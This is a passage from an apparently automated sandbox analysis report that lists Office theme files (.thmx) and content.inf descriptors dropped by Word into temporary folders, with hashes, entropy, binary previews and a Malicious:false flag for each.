                                                                                                                                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80A4.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.5361139545278144
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                                        SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                                        SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                                        SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80B5.tmp\Frame.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):523048
                                                                                                                                                        Entropy (8bit):7.715248170753013
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80B5.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.5159096381406645
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                                        SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                                        SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                                        SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80C6.tmp\Banded.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):562113
                                                                                                                                                        Entropy (8bit):7.67409707491542
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80C6.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.535736910133401
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                                        SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                                        SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                                        SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80D6.tmp\Metropolitan.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):777647
                                                                                                                                                        Entropy (8bit):7.689662652914981
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80D6.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):290
                                                                                                                                                        Entropy (8bit):3.5091498509646044
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                                        SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                                        SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                                        SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8136.tmp\Parcel.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):608122
                                                                                                                                                        Entropy (8bit):7.729143855239127
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8136.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.516359852766808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                                                        SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                                                        SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                                                        SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD81F3.tmp\Parallax.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):924687
                                                                                                                                                        Entropy (8bit):7.824849396154325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD81F3.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):282
                                                                                                                                                        Entropy (8bit):3.51145753448333
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                                        SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                                        SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                                        SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8264.tmp\Wood_Type.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1649585
                                                                                                                                                        Entropy (8bit):7.875240099125746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8264.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):284
                                                                                                                                                        Entropy (8bit):3.5552837910707304
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                                        SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                                        SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                                                        SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8274.tmp\Quotable.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):966946
                                                                                                                                                        Entropy (8bit):7.8785200658952
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                        Malicious:false
